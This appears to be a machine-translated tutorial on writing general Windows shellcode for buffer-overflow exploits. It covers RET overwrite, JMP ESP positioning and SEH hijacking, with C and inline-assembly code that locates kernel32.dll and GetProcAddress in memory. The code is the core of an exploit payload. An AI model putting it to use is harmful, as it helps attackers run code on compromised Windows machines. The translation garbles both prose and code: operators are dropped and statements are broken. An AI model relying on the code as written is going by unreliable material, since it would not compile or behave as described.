Senior skills written in Windows Shellcode
Author: yuange (mailto: yuange@nsfocus.com)
Home: http://www.nsfocus.com/
Unix and other systems because there is user concept, it is often overflow to get ordinary account first, then use overflow after logging in.
Load a shell method to get root permissions, its system call is convenient, so shellcode is generally better than
Simple. But the Windows system often does not provide login services, so shellcode, which is overflowed, often provides Socket
Connect, to load the program to get the shell, and the Windows system calls the int2e interface is not as good as the Unix system call INT80
Specification, so the API is usually used, and the API function address is not the same because the system version is different, so we must write
Windows is more practical below, and gelcode, gelcode is more troublesome.
After a period of thinking, I received a better way to write shellcode under Windows.
1, the overflow point is determined. This way to cover a RET instruction address using the overflow point, so you just know overflow
The point is approximately range.
2, shellcode positioning. Use the ESP register to locate, as long as the RET address covered in front is a JMP
The command address of the ESP function can be positioned.
3, RET command address, JMP ESP function command address using the address, 54 C3, or FF E4
, C3 this language of Windows address is fixed, and it is also very good to find this address.
4, Shellcode directly using C language, easy to write, modify, and debug.
5, shellcode unified encoding, meet the application conditions to the SHELLCODE limit, with a small assembly code
Code, you can write shellcode, you can do it without considering special characters.
6, communication encryption, dealing with firewall, implementing FTP functions, implementing advanced applications of memory directly to Web services.
The following main introductions the introduction to the method of writing general shellcode. The API used in the main shellcode used
GetProcAddress positioning, use libraries to load with LoadLibrarya. That's so shellcode just relying on these two
API. How do you solve the address of these two APIs? Loadlibrarya this API in system library kernel32.dll
Face, you can also get getProcAddress. That is to find the system library kernel32.dll and
GetProcaddress's address. Because the general application will load kernel32.dll, the solution is
Inside the memory found this system library and API address, fortunately, I know that the module data structure of Windows is not difficult, mainly
It is an increase in abnormal structure processing. Below is a VC6.0 program code:
Void shellcodefn ()
{
INT * EXCEPT [3];
FarProc ProcgetAdd = 0;
Char * stradd;
INT IMGBASE, FNBase, I, K, L
Handle Libhandle;
_asm {
JMP nextcall
GetStradd: Pop Stradd
Lea Edi, Except
Mov Eax, DWORD PTR FS: [0]
MOV DWORD PTR [EDI 0x08], EAX
Mov DWORD PTR FS: [0], EDI
}
Except [0] = 0xfffffffff;
Except [1] = stradd-0x07;
/ * Save an abnormal structure chain and modify the abnormal structural chain, Shellcode take over anomalous * / imgbase = 0x77E00000;
/ * Search the start of kernel32.dll's starting address * /
Call getExceptretadd
}
/ * Get an abnormal return address * /
For (; imgbase <0xBFFA0000, ProcgetAdd == 0;) {
IMGBase = 0x10000;
/ * Module address is 64K unit, speed up speed * /
IF (imgbase == 0x78000000) IMGBase = 0xBff00000;
/ * If it has not been searched yet, that may be Win9x system * /
IF (* (word *) IMGBASE == 'ZM' && * (Word *)
(IMGBASE * (INT *) (IMGBase 0x3c)) == 'EP') {
/ * Modular head * /
Fnbase = * (int *) (IMGBASE * (INT *) 0x78) IMGBASE;
K = * (int *) (fnbase 0xc) IMGBASE;
IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') {
/ * Module name * /
LibHandle = IMGBASE;
/ * Get the module header address, the module handle * /
K = IMGBASE * (INT *) (FNBase 0x20);
For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4) {
IF (* (INT *) (IMGBase * (INT *) K) == 'Pteg' && * (INT *) (4 IMGBase * (INT *) K) == 'acor') {
/ * Take the name * /
K = * (Word *) (L L IMGBASE * (INBASE 0x24));
K = * (int *) (fnbase 0x10) -1;
K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c));
ProcgetAdd = K IMGBASE;
/ * API address * /
Break;
}
}
}
}
}
// Search Kernel32. DLL module address and API function getProcAddress address
/ (Note that this is not in the case where the search page is processed.
_asm {
Lea Edi, Except
MOV Eax, DWORD PTR [EDI 0x08]
Mov DWORD PTR FS: [0], EAX
}
/ * Restore anomalous structure chain * /
IF (procgetadd == 0) goto die;
/ * If you didn't find the getProcAddress address dead loop * /
Die: Goto Die;
_asm {
getExceptretadd: POP EAX
Push EAX
MOV EDI, DWORD PTR [stradd]
MOV DWORD PTR [EDI-0X0E], EAX
RET
/ * Get an abnormal return address, and fill in the exception processing module * /
/ * Abnormal processing module * /
Errprogram: MOV Eax, DWORD PTR [ESP 0x0c] Add Eax, 0xB8
Mov DWORD PTR [EAX], 0x11223344 // stradd-0xe
/ * Modify exception Return EIP pointer * /
XOR Eax, EAX / / 2
/ * Do not prompt exception * /
Ret // 1
/ * Abnormal processing returns * /
ExecptProgram: JMP errprogram // 2 bytes stradd-7
NextCall: Call getstradd //5 bytes
}
}